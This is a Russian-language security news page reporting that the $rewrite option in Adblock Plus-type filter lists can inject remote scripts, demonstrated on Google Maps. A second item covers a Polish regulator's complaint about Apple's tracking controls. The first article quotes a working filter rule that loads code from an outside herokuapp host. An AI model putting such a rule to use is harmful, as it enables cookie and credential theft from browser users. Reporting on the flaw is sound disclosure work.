Фильтры AdBlock можно использовать для инъекции вредоносных скриптов

Фильтры AdBlock можно использовать для инъекции вредоносных скриптов

Фильтры AdBlock можно использовать для инъекции вредоносных скриптов

Новый эксплойт, недавно обнаруженный экспертом в области кибербезопасности, способен использовать фильтры популярных блокировщиков рекламы Adblock Plus, AdBlock и uBlocker для инъекции сторонних скриптов в код страниц веб-сайтов.

Adblock Plus, AdBlock и uBlocker представляют собой специальные расширения для браузеров, помогающие пользователям скрывать надоедливую и агрессивную рекламу со страниц ресурсов.

База пользователей этих блокировщиков насчитывает более 10 миллионов человек. Таким образом, если злоумышленнику удастся внедрить вредоносные скрипты, он получит возможность красть файлы cookie, учетные данные, а также осуществлять нужные ему редиректы.

Работа блокировщиков рекламы завязана на использовании списка URL, на которых был отмечен рекламный контент или даже вредоносное поведение. Тот же Adblock Plus, например, запрещает браузеру подключаться к этим ссылкам, следовательно, рекламные скрипты не в состоянии загрузиться.

Вся проблема кроется в опции списка фильтров под названием $rewrite, которая была представлена в 2018 году (в Adblocker Plus 3.2). Эта функция позволяет разработчику подменить запрос, совпадающий с определенным регулярным выражением, другим URL.

Единственное условие — заменяемая строка должна быть относительным URL-адресом. Таким образом, если запрос для example.com/ad.gif заменить на example.com/puppies.gif, пользователь вместо рекламы увидит картинку с милыми щенками.

При этом разработчики предусмотрели защиту, запретив запросы вида SCRIPT, SUBDOCUMENT, OBJECT и OBJECT_SUBREQUEST — с ними эта функция не будет работать.

Однако исследователь Армин Себастьян нашел способ, позволяющий создать правило, благодаря которому сторонний скрипт можно встроить в контент конкретного сайта.

Для этого потребуется найти ресурс, который допускает загрузку скриптов со сторонних доменов, а также использует XMLHttpRequest или Fetch для загрузки скриптов. Сам Себастьян довольно быстро нашел такой ресурс — он использовал Google Maps для демонстрации уязвимости.

Google Maps использует XMLHttpRequest для загрузки скриптов, что позволило эксперту воспользоваться функцией фильтров $rewrite для задействования скрипта со стороннего домена. Пример:

/^https://www.google.com/maps/_/js/k=.*/m=pw/.*/rs=.*/$rewrite=/search?hl=en-US&source=hp&biw=&bih=&q=majestic-ramsons.herokuapp.com&btnI=I%27m+Feeling+Lucky&gbv=1

Если пользователь в этом случае посетит google[.]com/maps/, фильтр использует редиректы Google для считывания контента с majestic-ramsons.herokuapp[.]com/.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Польский регулятор обвинил Apple в сборе данных при запрете на отслеживание

Польский антимонопольный регулятор обвинил Apple в том, что корпорация якобы вводит пользователей в заблуждение относительно уровня конфиденциальности, который предоставляет функция App Tracking Transparency (ATT). По мнению ведомства, Apple может использовать пользовательские данные даже тогда, когда человек запретил отслеживание.

Как пишет Reuters, Apple с обвинениями не согласна и заявляет, что давление регуляторов может вынудить её вовсе отключить эту функцию для пользователей в ЕС.

Это уже не первый конфликт компании с европейскими правилами. ЕС требует, чтобы Apple обеспечивала равные условия для сторонних разработчиков: если у Apple есть доступ к определённым данным, то и конкуренты должны иметь возможность получать аналогичную информацию.

Apple, в свою очередь, утверждает, что доступ к данным у неё организован так, чтобы приватность пользователей соблюдалась максимально, и она не может гарантировать, что сторонние компании будут действовать так же.

Последний пример — ситуация с Apple Watch. Часы могли получать историю Wi-Fi подключений с привязанного iPhone, но другие производители — нет. Вместо того чтобы раскрыть эти данные, Apple отключила функцию в моделях для ЕС.

Претензии к App Tracking Transparency

ATT требует, чтобы приложения спрашивали разрешение на отслеживание пользователя. Если человек говорит «нет», разработчики не могут использовать рекламный идентификатор устройства.

Польский регулятор полагает, что Apple якобы продолжает собирать данные для показа таргетированной рекламы в своих сервисах, например в App Store, независимо от согласия пользователя.

Глава UOKiK Томаш Хростный заявил, что политика ATT «могла ввести пользователей в заблуждение относительно уровня защиты персональных данных и одновременно дала Apple конкурентное преимущество».

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru